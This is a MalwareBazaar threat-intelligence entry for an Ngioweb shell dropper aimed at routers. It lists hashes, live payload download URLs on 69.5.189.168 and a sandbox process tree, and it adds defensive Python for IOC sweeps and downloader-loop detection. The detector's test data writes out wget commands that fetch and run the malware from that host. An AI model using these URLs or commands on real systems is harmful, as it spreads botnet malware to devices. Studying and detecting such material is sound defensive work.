MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Ngioweb


Vendor detections: 6

SHA256 hash: b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125
SHA3-384 hash: 499930061772d81fc41cd604d6d0154212d7ff3193e1cdd440601351ed9e0dc88ce9d0aee434de1c8afc0ac14e3236a7
SHA1 hash: 61d5c837edab0ce64353287e64914cd92998983f
MD5 hash: eb686f37e40a329e6dc441a3868f0b9b
humanhash: texas-india-princess-happy
File name: router-atemi-rep.sh
Signature: Ngioweb
File size: 824 bytes
First seen: 2025-11-08 07:54:35 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 12:7RDzyi+eqDiyi+eqDxyi+eqDHyi+eqDXgyi+eqDvyi+eqD7beyi+eqD7keyi+eN:19+Fs+FD+Fp+Fa+Fx+Fvw+F4w+S
TLSH: T16F0192BEC9685CDAD008CB007C706052511EC7CB6DE90B36B3BC2E7340AEA10702B63E
Magika: batch
Reporter: abuse_ch
Tags: sh
URL                               | Malware sample (SHA256 hash)                                     | Signature | Tags
http://69.5.189.168/frost.armv7   | ddebe545870ecfe87f0d403a1a1bbf0343c4b9ea4e727e2bdb1915f966658435 | Ngioweb   | elf Ngioweb ua-wget
http://69.5.189.168/frost.armv6   | 3f2c0e2becb201a5b2cd23b66deaa39b78fbea6cdc64e539edb442b99f5373d4 | Ngioweb   | elf Ngioweb ua-wget
http://69.5.189.168/frost.armv5   | 76e670a4333b77d5f69f0a51440618974bfb545309d57d00e6ca847e85631c86 | Ngioweb   | elf Ngioweb ua-wget
http://69.5.189.168/frost.mips    | 8a9b339fd801c708cb76a8204ccce25fa81d06703371c28f832220426886aaf9 | Ngioweb   | elf ua-wget
http://69.5.189.168/frost.mipsel  | cc5dfc104697e85043a20833fc7928418e8a7321b7b6368b37632fd13b1ec4fa | Ngioweb   | elf mirai Ngioweb ua-wget
http://69.5.189.168/frost.aarch64 | 1bb57d84b79bdca142f788f2317f6afa1f8071386ac4febc7529214ed995e964 | Ngioweb   | elf mirai Ngioweb ua-wget
http://69.5.189.168/frost.x86     | eeac99d3cb2e9e9c6c030c9964afccc0886688a0390a7849994146ac0c9604da | Ngioweb   | elf mirai Ngioweb ua-wget
http://69.5.189.168/frost.x86_64  | 07ddef2fde289218f356264bdf1d4409ffa44168c8e98c03ae3c5015ed62fbb4 | Ngioweb   | elf mirai Ngioweb ua-wget
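The rows above are the IOCs a responder actually needs from this entry. As an added example (not code from MalwareBazaar, from the reporter, or from the sample), the following Python builds a validated IOC set from those rows and sweeps a directory tree for files whose SHA256 matches, which is the first check on a Linux host or router suspected of having run this dropper. The scratch directory, the empty test file registered as an extra IOC, and the file-size cap are constructed assumptions; the hashes and URLs are copied from the table.

```python
"""Added example for this entry (not MalwareBazaar's, the reporter's or the
sample's code): turn the payload table into a validated IOC set and sweep a
directory tree for files whose SHA256 matches. Anything marked 'assumption'
or 'constructed' is not from the page."""
import hashlib
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit, urlunsplit

# Subject of this entry (router-atemi-rep.sh) and the eight payloads it
# fetches, copied from the table as (URL, SHA256).
DROPPER_SHA256 = "b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125"
PAYLOADS = [
    ("http://69.5.189.168/frost.armv7",   "ddebe545870ecfe87f0d403a1a1bbf0343c4b9ea4e727e2bdb1915f966658435"),
    ("http://69.5.189.168/frost.armv6",   "3f2c0e2becb201a5b2cd23b66deaa39b78fbea6cdc64e539edb442b99f5373d4"),
    ("http://69.5.189.168/frost.armv5",   "76e670a4333b77d5f69f0a51440618974bfb545309d57d00e6ca847e85631c86"),
    ("http://69.5.189.168/frost.mips",    "8a9b339fd801c708cb76a8204ccce25fa81d06703371c28f832220426886aaf9"),
    ("http://69.5.189.168/frost.mipsel",  "cc5dfc104697e85043a20833fc7928418e8a7321b7b6368b37632fd13b1ec4fa"),
    ("http://69.5.189.168/frost.aarch64", "1bb57d84b79bdca142f788f2317f6afa1f8071386ac4febc7529214ed995e964"),
    ("http://69.5.189.168/frost.x86",     "eeac99d3cb2e9e9c6c030c9964afccc0886688a0390a7849994146ac0c9604da"),
    ("http://69.5.189.168/frost.x86_64",  "07ddef2fde289218f356264bdf1d4409ffa44168c8e98c03ae3c5015ed62fbb4"),
]
HEX64 = re.compile(r"^[0-9a-f]{64}$")
# Known answer: SHA256 of the empty file, registered by demo() as a constructed extra IOC.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"


def defang(url):
    """hxxp://69[.]5[.]189[.]168/frost.x86: only scheme and host are defanged,
    so the path stays searchable in tickets and logs."""
    p = urlsplit(url)
    return urlunsplit((p.scheme.replace("http", "hxxp", 1),
                       p.netloc.replace(".", "[.]"), p.path, p.query, p.fragment))


def _digest(value, what):
    """Normalise and validate a SHA256 string; a truncated or fused copy/paste
    must fail loudly instead of silently becoming a 'known bad' entry."""
    value = value.strip().lower()
    if not HEX64.match(value):
        raise ValueError(f"not a SHA256 digest for {what}: {value!r}")
    return value


def build_iocs(rows, dropper=DROPPER_SHA256):
    """Return {sha256: label} for the dropper plus every payload row."""
    iocs = {_digest(dropper, "dropper"): "Ngioweb dropper script"}
    for url, digest in rows:
        arch = urlsplit(url).path.rsplit("frost.", 1)[-1]   # frost.<arch> naming from the table
        iocs[_digest(digest, url)] = f"Ngioweb payload ({arch}) from {defang(url)}"
    return iocs


def sha256_of(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, iocs, max_size=16 << 20):
    """Hash every regular file under root (symlinks skipped, so a planted link
    cannot pull the sweep outside the tree) and return [(path, label)] hits.
    max_size is an assumption: the payloads are small, and the cap keeps the
    sweep from reading large logs or firmware images."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue
        try:
            if path.stat().st_size > max_size:
                continue
            digest = sha256_of(path)
        except OSError:            # unreadable, or removed mid-sweep like the rm in the dropper loop
            continue
        if digest in iocs:
            hits.append((str(path), iocs[digest]))
    return hits


def demo():
    """Constructed run: a scratch tree holding a benign note and an empty file
    whose hash is registered as an extra IOC; only the empty file should hit."""
    iocs = dict(build_iocs(PAYLOADS))
    iocs[EMPTY_SHA256] = "constructed test file (empty)"
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "tmp").mkdir()
        (Path(tmp) / "tmp" / "bpuh").write_bytes(b"")                 # stand-in for a dropped payload
        (Path(tmp) / "notes.txt").write_text("constructed, benign\n")
        return sweep(tmp, iocs)


if __name__ == "__main__":
    for path, label in demo():
        print(f"{label}: {path}")
```

On a live host the sweep would be pointed at /tmp, /var/tmp, /dev/shm and wherever the device stores writable data; a miss does not clear the host, since the dropper deletes each binary after running it (see the behavior graph below), so a hash sweep is complemented by checking for processes with deleted executables and for connections to the payload host.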

Intelligence


File Origin
# of uploads: 1
# of downloads: 38
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive mirai

Verdict: Malicious
File Type: text
First seen: 2025-11-08T05:23:00Z UTC
Last seen: 2025-11-08T05:57:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph (process tree recovered from the rendered graph):
  /usr/bin/sudo (pid 3324)
    execve -> /tmp/sample.bin (pid 3329)
      eight download cycles, one per payload URL, each of:
        execve -> /usr/bin/wget   (net, send-data, write-file; 136-140 B sent to 69.5.189.168:80)
        execve -> /usr/bin/chmod
        clone  -> /usr/bin/dash   (in six of the eight cycles)
        execve -> /usr/bin/rm     (delete-file)
      in the last two cycles the fetched binary runs instead of dash:
        execve -> /tmp/bpuh (pid 3516, delete-file)
          clone -> /tmp/bpuh (pid 3518; net, send-data, zombie)
            con  -> 69.5.189.168:5555
            send -> 1.0.0.1:53 (29 B)
        execve -> /tmp/bpuh (pid 3529, delete-file)
          clone -> /tmp/bpuh (pid 3530; net, send-data, zombie)
            send -> 69.5.189.168:5555 (67 B)
            send -> 1.0.0.1:53 (29 B)
            clone -> /tmp/bpuh (pid 3648; net, net-scan, send-data, zombie)
              con -> 8.8.8.8:53
              send-data to 256 IP addresses (review logs to see them all)
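The graph is the signature of a multi-architecture downloader: the parent fetches one binary after another from the same host, marks it executable, runs it, deletes it, and the one that fits the CPU stays up and connects back to the payload host on a non-HTTP port. As an added example (not code from MalwareBazaar, from the reporter, or from the sample), the following Python detects that loop over process and network events. The event schema, the wget -O and chmod argument forms, the /tmp/bpuh file name as the download target, and the pid numbers in the constructed telemetry are assumptions modelled on the graph, not something the page records verbatim.

```python
"""Added example, not code from MalwareBazaar, the reporter or the sample:
detect the wget -> chmod -> exec -> rm loop shown in the behavior graph, run
over constructed events shaped like auditd/EDR telemetry. Event schema,
argument forms and pids are assumptions modelled on the graph."""
from collections import defaultdict
from urllib.parse import urlsplit

DOWNLOADERS = {"/usr/bin/wget", "/usr/bin/curl"}


def download_target(argv):
    """(url, output_path) from a wget/curl argv, or None if no URL is present.
    -O/-o give the path; otherwise wget's default is the URL basename."""
    url = out = None
    i = 1
    while i < len(argv):
        if argv[i] in ("-O", "-o") and i + 1 < len(argv):
            out = argv[i + 1]
            i += 2
            continue
        if argv[i].startswith(("http://", "https://")):
            url = argv[i]
        i += 1
    if url is None:
        return None
    return url, out or urlsplit(url).path.rsplit("/", 1)[-1] or "index.html"


def detect_downloader_loops(events):
    """events: chronological dicts of kind exec {pid, ppid, exe, argv},
    clone {pid, ppid} or connect {pid, dst "ip:port"}.
    Returns (loops, findings): one loop per download started under a parent,
    with chmod/executed/deleted flags and the connections its process made."""
    pending = {}        # (parent pid, dropped path) -> loop still in flight
    payload_pids = {}   # pid of a running payload, or of its forks -> its loop
    loops = []
    for ev in events:
        kind, pid = ev["kind"], ev["pid"]
        if kind == "clone":
            if ev["ppid"] in payload_pids:
                payload_pids[pid] = payload_pids[ev["ppid"]]
            continue
        if kind == "connect":
            loop = payload_pids.get(pid)
            if loop:
                loop["connections"].append(ev["dst"])
            continue
        ppid, exe, argv = ev["ppid"], ev["exe"], ev.get("argv", [])
        if exe in DOWNLOADERS:
            target = download_target(argv)
            if target:
                loop = {"parent": ppid, "url": target[0], "path": target[1], "chmod": False,
                        "executed": False, "deleted": False, "exec_pid": None, "connections": []}
                pending[(ppid, target[1])] = loop
                loops.append(loop)
        elif exe == "/usr/bin/chmod":
            for p in argv[1:]:
                if (ppid, p) in pending:
                    pending[(ppid, p)]["chmod"] = True
        elif exe == "/usr/bin/rm":
            for p in argv[1:]:
                loop = pending.pop((ppid, p), None)
                if loop:
                    loop["deleted"] = True
        elif (ppid, exe) in pending:            # the parent ran what it just fetched
            loop = pending[(ppid, exe)]
            loop["executed"], loop["exec_pid"] = True, pid
            payload_pids[pid] = loop
        elif ppid in payload_pids:              # a running payload re-exec'd itself
            payload_pids[pid] = payload_pids[ppid]

    findings = []
    names = defaultdict(set)
    for loop in loops:
        names[loop["parent"]].add(urlsplit(loop["url"]).path.rsplit("/", 1)[-1])
    for parent, n in names.items():
        if len(n) >= 3:     # one binary per CPU architecture is the Mirai/Ngioweb idiom
            findings.append(f"pid {parent}: multi-architecture downloader ({len(n)} distinct payloads)")
    for loop in loops:
        host = urlsplit(loop["url"]).hostname
        for dst in loop["connections"]:
            if dst.rsplit(":", 1)[0] == host:
                findings.append(f"pid {loop['exec_pid']}: dropped {loop['path']} connected back to payload host {dst}")
    return loops, findings


def sample_events():
    """Constructed telemetry with the graph's shape: sudo -> /tmp/sample.bin,
    one cycle per architecture; only the last binary runs on this sandbox."""
    host = "http://69.5.189.168"
    ev = [{"kind": "exec", "pid": 3329, "ppid": 3324, "exe": "/tmp/sample.bin", "argv": ["/tmp/sample.bin"]}]
    pid = 3331

    def add(**e):
        nonlocal pid
        e["pid"] = pid
        pid += 1
        ev.append(e)
        return e["pid"]

    for arch, runs in (("armv7", False), ("mips", False), ("x86", False), ("x86_64", True)):
        add(kind="exec", ppid=3329, exe="/usr/bin/wget", argv=["wget", "-q", "-O", "/tmp/bpuh", f"{host}/frost.{arch}"])
        add(kind="exec", ppid=3329, exe="/usr/bin/chmod", argv=["chmod", "777", "/tmp/bpuh"])
        if runs:
            run_pid = add(kind="exec", ppid=3329, exe="/tmp/bpuh", argv=["/tmp/bpuh"])
            child = add(kind="clone", ppid=run_pid)
            ev.append({"kind": "connect", "pid": child, "dst": "69.5.189.168:5555"})
            ev.append({"kind": "connect", "pid": child, "dst": "1.0.0.1:53"})
        else:   # mirrors the /usr/bin/dash clone the graph shows for the other cycles
            add(kind="exec", ppid=3329, exe="/usr/bin/dash", argv=["sh"])
        add(kind="exec", ppid=3329, exe="/usr/bin/rm", argv=["rm", "-f", "/tmp/bpuh"])
    return ev


if __name__ == "__main__":
    loops, findings = detect_downloader_loops(sample_events())
    for loop in loops:
        print(loop["url"], "executed" if loop["executed"] else "not executed", "deleted" if loop["deleted"] else "kept")
    print("\n".join(findings))
```

The loop detector keys on the parent pid plus the dropped path, so the same /tmp/bpuh name reused across cycles is matched to the right wget; the multi-architecture finding fires on three or more distinct payload names from one parent, which separates this pattern from a script that legitimately fetches a single binary.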
Threat name: Linux.Trojan.Generic
Status: Suspicious
First seen: 2025-11-08 07:55:22 UTC
File Type: Text (Shell)
AV detection: 10 of 24 (41.67%)
Threat level: 5/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | File type | SHA256 hash
Web download    | Ngioweb   | sh        | b83ec68f00187d77fa8bf6d792954470116c098847afd77025f4d1b0eb765125 (this sample)

Delivery method: Distributed via web download

Comments